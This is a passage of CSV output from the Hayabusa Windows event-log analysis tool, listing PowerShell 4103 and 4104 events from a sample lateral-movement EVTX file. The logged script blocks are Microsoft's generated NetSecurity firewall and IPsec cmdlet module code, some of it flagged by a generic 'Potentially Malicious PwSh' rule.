ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and 
$PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.701 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.701 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.702 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.733 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.733 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.740 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.741 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue 
= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() 
Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] 
${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
